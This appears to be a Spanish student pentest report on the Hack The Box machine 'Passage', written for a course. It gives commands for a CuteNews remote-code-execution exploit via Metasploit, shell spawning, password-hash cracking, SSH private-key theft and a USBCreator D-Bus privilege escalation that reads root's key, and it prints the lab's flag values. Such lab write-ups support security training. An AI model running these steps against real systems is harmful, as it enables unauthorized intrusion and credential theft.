Descarga la aplicación para disfrutar aún más
Vista previa del material en texto
Contenido 1. Tabla de control de documentos 2 2. Resumen 2 3. Metodología 2 4. Informe de evaluación 2 5. Resultados obtenidos 9 6. Conclusión y recomendación 10 7. Apéndice 10 1. Tabla de control de documentos AUTORES FECHA DE ENTREGA PÁGINAS VERSIÓN ESTADO Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez 30/09/2020 4 1,0 Metodologías de Escaneos Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez 10/10/2020 9 1.1 Escaneos de Hack the box: Passagge. Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez 13/10/2020 21 1.2 Resultado Final: Procedimiento y Solución 2. Resumen Descripción del proyecto La partica que realzaremos será en la paginas oficial de Hack the box la cual escogeremos una máquina para obtener los archivos user.txt y root.txt con la ayuda del sistema operativo Kali Linux esto será en un habiente virtual también utilizaremos Nmap y Metasloit framework para tener acceso a nuestra maquina ya previamente seleccionada con los cuales detallamos todos los puntos importante en este informe. Metas · Reconocimiento de la plataforma o maquina ya seleccionada, se le realizar el ingreso por su dirección ip para realizar un escaneo y obtener información. · Escaneo y búsqueda de los puertos abiertos en las cuales utilizaremos el comando nmap para obtener exploit y poder acceder a las maquinas. · Obtener acceso con la ejecución de los exploit encontrados y sus respectivos payload los cuales nos permitirán obtener las credenciales de los archivos user.txt y root.txt. Encontrar recuentos Hallazgos totales Obtuvimos 2 hallazgos importante que son los usuarios.txt y root.txt los cueles nos permitió tener acceso Alcance g0tmi1k, «Kali Linux - Documentation,» 25 11 2019. [En línea]. Available: https://www.kali.org/docs/introduction. fechas Patada inicial Prueba activa 13/10/2020 Entrega de informes 3. Metodología Mediante una evaluación previa a nuestro objetivo Hack The Box controlada y que contiene máquinas virtuales que permite obtener con facilidad la dirección ip dando así una facilidad de escanear y obtener los puertos para posterior penetrar y obtener informaciones relevantes. Debido a la información proporcionada anterior evaluamos y decidimos por una aplicación que nos ayuda a obtener información de la misma como es Nmap una herramienta que nos permite navegar redes más aun para obtener host simple a través de paquetes IP; obteniendo información de una red disponible, servicios que utiliza con su versión en el momento, bajo qué sistema operativo esta creado y corre, firewall utilizado por la misma. Posterior a una conexión vpn para administrarlo desde consola de sistema operativo de Kali y evaluación oportuna de cada uno de pasos importantes para obtener lo requerido; uno de ellos es detectar los puertos abiertos e identificar si existen usuarios por defecto. Con la información de este paso se realizó la búsqueda de los exploit para acceder a las maquinas; mediante la ejecución de los exploit con los respectivos payload se procedió al ingreso en las maquinas objetivos para poder descubrir las credenciales de los archivos user.txt y root.txt. 4. Informe de evaluación En el siguiente informe se detalladle los hallazgos durante la penetración hacia la maquina Passage de la plataforma HACK THE BOX. La maquina Passage es un servidor web con sistema operativo Linux el cual cuenta con un sitio web de noticias el cual usa programas como: · Fail2Ban: Es un software escrito en python para prevenir accesos no deseados instalados en servidores linux, luego de x intentos bloquea la ip. Evita que se estén validando y probando diferentes contraseñas para acceder al servidor bloqueando la conexión por medio de ssh. Problemas identificados Se encontró varias vulnerabilidades dentro del servidor tanto de aplicaciones exteriores y visible para cualquier usuario, así también aplicaciones por defecto del sistema operativo internas del servidor. 1. Vulnerabilidad en la aplicación CuteNews del sitio web de Passage Medio CuteNews: Es un gestor de noticias para páginas web o blog gratuito basados en archivos de texto plano, desarrollado por CutePHP. Detalle: Conexión a la maquina mediante VPN, para permitir realizar el escaneo de los puertos del servidor mediante la herramienta nmap y la siguiente línea de comando: root@kali:~/Escritorio/Passage# nmap -sV -O -sC -A -oN Dyplesher.txt 10.10.10.206 Después de realizar el escaneo se identificó el puerto 22 abierto para conexión remota mediante ssh. Luego se realizo el registro dentro del sitio web del servidor con las siguientes credenciales. Usuario: Alexander Contraseña: AlexC40S Se identifico que ocupaba CuteNews 2.1.2 el cual es una versión vulnerable a posibles ataques, utilizando la herramienta Metasploit se encontró el exploit para esta versión de CuteNews. Ilustración 1 Búsqueda de vulnerabilidad Se modifico el exploit debido a que contenía error en la línea de Refeneces se editó los siguientes parámetros del código: 'References' => [ ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'], ['URL', 'http://cutephp.com'] # Official Website ], Ilustración 2Edición de código del exploit Luego se procedió a mover el archivo dentro del directorio onde están los exploit de Metasploit utilizando el siguiente comando: root@kali:~# mv 46698.rb /usr/share/metasploit-framework/modules/exploits/multi/http Una vez movido el exploi se procedió a la búsqueda y el uso del exploit con los siguientes comandos msf5 > search 46698 msf5 > use 0 msf5 exploit(multi/46698) > show options Para el uso del exploit se utilizaron los siguientes parámetros: IP del atacante: 10.10.15.32 IP del objetivo: 10.10.10.206 Las credenciales de usuario y contraseña son del registro previo en la página. Usuario: Alexander Contraseña: AlexC40S Ejecutar el exploit con el comando run Ilustración 3 Seteo de parámetro para usar el exploit Ejecución del comando: meterpreter > shell Para poder establecer la conexión a la maquina víctima. Para poder mantener la conexión se ejecuta el siguiente comando: python -c "import pty;pty.spawn('/bin/bash')" Ilustración 4 Establecer conexión con la victima Debido a que este usuario no tenía acceso al archivo users.txt revisamos un archivo llamado lines con el comando cat lines, en el cual existen datos en base 64. Una vez identificado estos archivos se procedió a descifrarlos usando el comando: root@kali:~/Escritorio/Passage# echo CodigoDentroDeLine | base64 -d Para usar este comando se remplazó la palabra CodigoDentroDeLine y pegar el código del archivo line dentro. Realizando cada descifrado de código se encontraron solo 2 usuarios con una terminación de @passage.htb Ilustración 5 Descifrado de códigos del archivo lines Luego de ejecutar el comando se encontró la siguiente información con el usuario y la clave cifrada. a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}} Para descifrar este código se usó la página https://crackstation.net/ Solo se pudo descifrar la contraseña del usuario Paul. Información encontrada: Usuario: paul@passage.htb Has: e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd Contraseña: atlanta1 Usuario: nadav@passage.htb Has: 7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1 Contraseña: Dirigirse al directorio cdata/users onde se encuentran los usuarios para ingresar como Paul se ejecuta el siguiente comando y se escribe la contraseña www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul Password: atlanta1 Una vez dentro como el usuario dirigirse al directorio ~/.ssh donde se realiza larecopilación de las claves ssh privada de Paul para el ingreso desde la maquina atacante Listamos los archivos con ls y con cat vemos lo que existe dentro de id_rsa copiar lo que esta dentro del archivo. paul@passage:/var/www/html/CuteNews/cdata/users$ cd ~/.ssh paul@passage:~/.ssh$ ls paul@passage:~/.ssh$ cat id_rsa Ilustración 6 Código ssh para el acceso del usuario paul Debido a la gran cantidad de archivos en el directorio de paul se aplicó el comando cat. */* para ver los archivos paul@passage:~$ cat. */* Ilustración 7 Identificación del usuario nadav Encontramos al usuario nadav dentro del directorio de paul. Esto puede decir que existe algún vínculo entre el usuario Paul y Nadav asique se procede a usar la misma clave de paul. paul@passage:~$ ssh nadav@10.10.10.206 2. Vulnerabilidad en la aplicación Startup Disk Creator dentro del servidor Passage Alto Detalle: Luego de acceder como el usuario nadav se procedió a listar los procesos de ejecución con el comando: nadav@passage:~$ ps aux Se encontró el siguiente programa ejecutado con privilegio root Ilustración 8 Proceso ejecutándose en el usuario root Es utilizado por el programa Startup Disk Creator para crear Live Usb integrado en ubuntu en todas las versiones posteriores a Ubuntu 8.0.4 Sobre esta herramienta existe una vulnerabilidad que permite la escalabilidad de privilegio. El USBCreator utiliza Python para escribir en el disco, si realizar comprobación de en qué archivo se está escribiendo, ni solicita contraseña a los usuarios que pertenecen al grupo sudo, debido a esta vulnerabilidad podemos acceder al usuario root. Para obtener el id_rsa del usuario root desde el directorio raíz en la carpeta tmp. Ejecutamos el siguiente comando: nadav@passage:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true Se crea un archivo con el nombre pwn en el cual se guarda la credencial del usuario root, con un cat vemos lo que está dentro del archivo y lo copiamos en otro archivo para acceder mediante ssh al usuario root. Ilustración 9 Credenciales ssh del usuario root Creamos un archivo con la contraseña de root root@kali:~/Escritorio/Passage# touch root root@kali:~/Escritorio/Passage# nano root Luego accedemos desde este directorio donde esta guardada la clave del root. root@kali:~/Escritorio/Passage# ssh -i root root@10.10.10.206 root@passage:~# ls root@passage:~# cat root.txt Listamos y abrimos el archivo root.txt Ilustración 10 Código del archivo roott.txt Contraseña del archivo root.txt f304c0fcf7fccecad9d87e8bf85b74c6 Dentro de root nos diriguimos al directorio home para ver el archivo user.txt que se encontraba dentro del usuario paul. Comandos root@passage:~# cd home root@passage:~# cd paul/ root@passage:/home/paul# cat user.txt Ilustración 11 Código del archivo user.txt Contraseña del archivo user.txt 9c075122cbcb34db7730fad6be18fc1a 5. Resultados obtenidos “El conocimiento no es una vasija que se llena, sino un fuego que se enciende”. Plutarco Luego de los procesos y métodos detallados que se realizaron se obtuvo la clave para poder acceder a uno de los servidores que tiene; navegamos en la paginas de hack the box y posterior se obtuvo el objetivo: Digitamos cualquier clave Al no digitar la clave correcta nos dio un mensaje de error, debemos digitar precisamente la clave obtenido: Objetivo logrado 6. Conclusión y recomendación Entendimos que es un poco complejo al momento de realizar esta práctica la cual nos fortaleció nuestro conocimiento respectivo para obtener un usuario y root de las máquinas, para tener una mejor enseñanza apropiada debería el docente poner más en práctica durante las clases. 7. Apéndice APÉNDICE A - CLASIFICACIÓN DE CRITERIOS A continuación se muestran los criterios de calificación de riesgo utilizados para clasificar este informe: Gravedad Descripción CRÍTICO Permitir la escalabilidad de privilegio en la cual nos permitirá acceder a usuario root para obtener el id_rsa del usuario root en donde encontraremos nuestra contraseña ALTO Búsqueda de una clave cifrada la cual nos ayudara a obtener nuestro usuario una vez ya descifrada. MEDIO Obtener los puertos que se utilizan en la máquina y su exploit adecuado a utilizar para así poder tener acceso. BAJO Búsqueda de información con la ip de la máquina para tener una mayor un mayor entendimiento.
Compartir